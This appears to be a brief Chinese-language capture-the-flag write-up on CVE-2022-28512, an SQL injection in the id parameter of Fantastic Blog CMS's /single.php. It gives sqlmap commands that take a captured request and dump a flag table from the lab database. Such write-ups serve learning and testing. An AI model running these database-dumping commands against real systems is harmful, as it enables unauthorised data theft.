0%

CVE-2022-28512

Fantastic Blog (CMS)是一个博客/文章网络内容管理系统。该CMS的/single.php路径下,id参数存在一个SQL注入漏洞

CVE-2022-28512

打开题目

按照漏洞描述在/single.php路径的参数id存在sql注入漏洞,我们手动注入一下

可以发现测试成功,我们bp抓包并保存下来,然后使用sqlmap

1
python sqlmap.py -l "./requests/1.txt"

得到flag

1
python sqlmap.py -l "./requests/1.txt" -D ctf -T flag -C flag --dump